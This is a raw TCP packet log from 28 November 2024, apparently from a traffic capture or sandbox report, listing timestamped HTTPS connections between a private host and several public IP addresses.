                                                        Nov 28, 2024 13:35:38.582362890 CET49870443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:38.582410097 CET4434987013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:38.582437992 CET4434987013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:38.585128069 CET49877443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:38.585177898 CET4434987713.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:38.585269928 CET49877443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:38.585434914 CET49877443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:38.585450888 CET4434987713.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:38.622952938 CET4434987213.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:38.624700069 CET4434987313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:38.628484964 CET49872443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:38.628508091 CET4434987213.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:38.628993988 CET49872443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:38.628998995 CET4434987213.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:38.629225016 CET49873443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:38.629254103 CET4434987313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:38.629617929 CET49873443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:38.629625082 CET4434987313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:39.004786015 CET4434987113.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:39.004836082 CET4434987113.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:39.005404949 CET49871443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:39.006191015 CET49871443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:39.006206989 CET4434987113.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:39.006217003 CET49871443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:39.006222010 CET4434987113.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:39.009105921 CET49878443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:39.009121895 CET4434987813.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:39.009223938 CET49878443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:39.009391069 CET49878443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:39.009397984 CET4434987813.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:39.077402115 CET4434987213.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:39.077455997 CET4434987213.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:39.078512907 CET4434987313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:39.078589916 CET4434987313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:39.081151962 CET49872443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:39.082058907 CET49873443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:39.138178110 CET49872443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:39.138191938 CET4434987213.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:39.138200998 CET49872443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:39.138210058 CET4434987213.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:39.140439034 CET49873443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:39.140466928 CET4434987313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:39.140500069 CET49873443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:39.140506983 CET4434987313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:39.230794907 CET49879443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:39.230813026 CET4434987935.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:39.234203100 CET49879443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:39.241782904 CET49879443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:39.241795063 CET4434987935.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:39.327970028 CET49880443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:39.328001976 CET4434988013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:39.328140974 CET49880443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:39.337598085 CET49880443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:39.337610960 CET4434988013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:39.339909077 CET49881443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:39.339970112 CET4434988113.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:39.340080023 CET49881443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:39.340204954 CET49881443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:39.340217113 CET4434988113.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:39.835247993 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:39.835284948 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:39.836970091 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:39.836982012 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:39.837471962 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:39.837486029 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:39.837692022 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:39.840668917 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:39.840672970 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:40.175709009 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:40.178888083 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:40.178903103 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:40.178913116 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:40.178919077 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:40.425571918 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:40.427628994 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:40.427637100 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:40.435237885 CET4434987713.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:40.435714006 CET49877443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:40.435775995 CET4434987713.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:40.436147928 CET49877443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:40.436161995 CET4434987713.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:40.497492075 CET4434987935.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:40.497859955 CET49879443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:40.497883081 CET4434987935.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:40.498174906 CET4434987935.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:40.498486042 CET49879443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:40.498538971 CET4434987935.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:40.498691082 CET49879443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:40.543333054 CET4434987935.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:40.550998926 CET49879443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:40.640113115 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:40.643024921 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:40.643038034 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:40.728998899 CET4434987813.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:40.729459047 CET49878443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:40.729474068 CET4434987813.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:40.729897976 CET49878443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:40.729902029 CET4434987813.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:40.894711971 CET4434987713.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:40.894783974 CET4434987713.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:40.896573067 CET49877443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:40.896996021 CET49877443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:40.896996021 CET49877443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:40.897038937 CET4434987713.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:40.897063017 CET4434987713.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:40.899249077 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:40.899261951 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:40.984483957 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:40.987024069 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:40.987037897 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:41.002331972 CET4434987935.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:41.002804995 CET4434987935.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:41.002887964 CET49879443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:41.003066063 CET49879443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:41.003078938 CET4434987935.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:41.060651064 CET4434988113.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:41.061203003 CET49881443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:41.061249971 CET4434988113.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:41.061575890 CET49881443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:41.061583996 CET4434988113.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:41.126996994 CET4434988013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:41.130105019 CET49880443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:41.130129099 CET4434988013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:41.130469084 CET49880443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:41.130475044 CET4434988013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:41.169656992 CET4434987813.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:41.169712067 CET4434987813.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:41.169907093 CET49878443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:41.169929981 CET49878443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:41.169940948 CET4434987813.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:41.169951916 CET49878443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:41.169958115 CET4434987813.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:41.172683001 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:41.172689915 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:41.233295918 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:41.235812902 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:41.235822916 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:41.485706091 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:41.492563009 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:41.492582083 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:41.502104998 CET4434988113.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:41.502166986 CET4434988113.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:41.502327919 CET49881443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:41.502372026 CET49881443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:41.502372026 CET49881443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:41.502397060 CET4434988113.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:41.502409935 CET4434988113.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:41.504437923 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:41.504443884 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:41.576980114 CET4434988013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:41.577052116 CET4434988013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:41.577282906 CET49880443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:41.577325106 CET49880443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:41.577336073 CET4434988013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:41.577348948 CET49880443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:41.577353954 CET4434988013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:41.586180925 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:41.586189032 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:41.625113964 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:41.633306026 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:41.633316040 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:41.696086884 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:41.732625961 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:41.732640982 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:41.835611105 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:41.888219118 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:41.951754093 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:42.007771015 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:42.007782936 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:42.067980051 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:42.117218018 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:42.122718096 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:42.122733116 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:42.123747110 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:42.125041962 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:42.125066042 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:42.132565975 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:42.133038044 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:42.133063078 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:42.162163973 CET49884443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:42.162194014 CET4434988435.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:42.162559032 CET49884443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:42.162765980 CET49884443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:42.162779093 CET4434988435.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:42.456654072 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:42.463433027 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:42.507333994 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:42.579091072 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:42.630899906 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:42.630908966 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:42.633833885 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:42.633841991 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:42.634082079 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:42.634085894 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:42.667778015 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:42.670094013 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:42.670110941 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:42.672086000 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:42.715331078 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:42.917757034 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:42.920444012 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:42.920459032 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:43.090158939 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:43.092843056 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:43.092856884 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:43.094036102 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:43.134078026 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:43.134084940 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:43.137355089 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:43.137448072 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:43.137474060 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:43.137691021 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:43.183331013 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:43.300525904 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:43.304672003 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:43.304691076 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:43.466945887 CET4434988435.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:43.467325926 CET49884443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:43.467339993 CET4434988435.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:43.467689037 CET4434988435.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:43.468081951 CET49884443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:43.468146086 CET4434988435.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:43.468314886 CET49884443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:43.510988951 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:43.513845921 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:43.513863087 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:43.515336990 CET4434988435.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:43.521343946 CET49884443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:43.548015118 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:43.554858923 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:43.554872036 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:43.556891918 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:43.603327990 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:43.666155100 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:43.668484926 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:43.668499947 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:43.758599043 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:43.773075104 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:43.773087978 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:43.949561119 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:43.952374935 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:43.952388048 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:43.955363035 CET4434988435.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:43.955431938 CET4434988435.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:43.958766937 CET49884443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:43.959142923 CET49884443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:43.959151983 CET4434988435.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:43.973685980 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:43.978171110 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:43.978182077 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:43.980699062 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:44.027339935 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:44.137702942 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:44.140510082 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:44.140522957 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:44.143104076 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:44.187330008 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:44.348124981 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:44.352586031 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:44.352598906 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:44.379432917 CET44349861142.250.181.68192.168.2.4
                                                        Nov 28, 2024 13:35:44.379496098 CET44349861142.250.181.68192.168.2.4
                                                        Nov 28, 2024 13:35:44.380484104 CET49861443192.168.2.4142.250.181.68
                                                        Nov 28, 2024 13:35:44.463994980 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:44.472892046 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:44.583615065 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:44.589934111 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:44.793986082 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:44.798104048 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:44.798115015 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:44.800379038 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:44.800383091 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:44.800513983 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:44.800518990 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:44.801382065 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:44.801386118 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:44.801974058 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:44.801976919 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:45.071914911 CET49886443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:45.071933985 CET4434988635.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:45.079401016 CET49886443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:45.080070972 CET49886443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:45.080080986 CET4434988635.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:45.132258892 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:45.149838924 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:45.149851084 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:45.254571915 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:45.301621914 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:45.301629066 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:45.304755926 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:45.304764986 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:45.342447996 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:45.344547987 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:45.344561100 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:45.344602108 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:45.346405029 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:45.346431017 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:45.382601976 CET49861443192.168.2.4142.250.181.68
                                                        Nov 28, 2024 13:35:45.382658958 CET44349861142.250.181.68192.168.2.4
                                                        Nov 28, 2024 13:35:45.668637037 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:45.671364069 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:45.719336033 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:45.789231062 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:45.829953909 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:45.829965115 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:45.834353924 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:45.834363937 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:45.834729910 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:45.834738016 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:45.879194975 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:45.882750034 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:45.882764101 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:45.882771969 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:45.882775068 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:46.133888960 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:46.136539936 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:46.136554003 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:46.288069010 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:46.290666103 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:46.290679932 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:46.291713953 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:46.298381090 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:46.298393011 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:46.303913116 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:46.344058990 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:46.349948883 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:46.395319939 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:46.470624924 CET4434988635.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:46.471297979 CET49886443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:46.471311092 CET4434988635.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:46.471714973 CET4434988635.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:46.475917101 CET49886443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:46.475969076 CET4434988635.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:46.476310015 CET49886443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:46.498547077 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:46.505207062 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:46.505219936 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:46.521977901 CET49886443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:46.521982908 CET4434988635.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:46.709778070 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:46.712867022 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:46.712879896 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:46.786956072 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:46.790983915 CET4434986013.107.246.63192.168.2.4
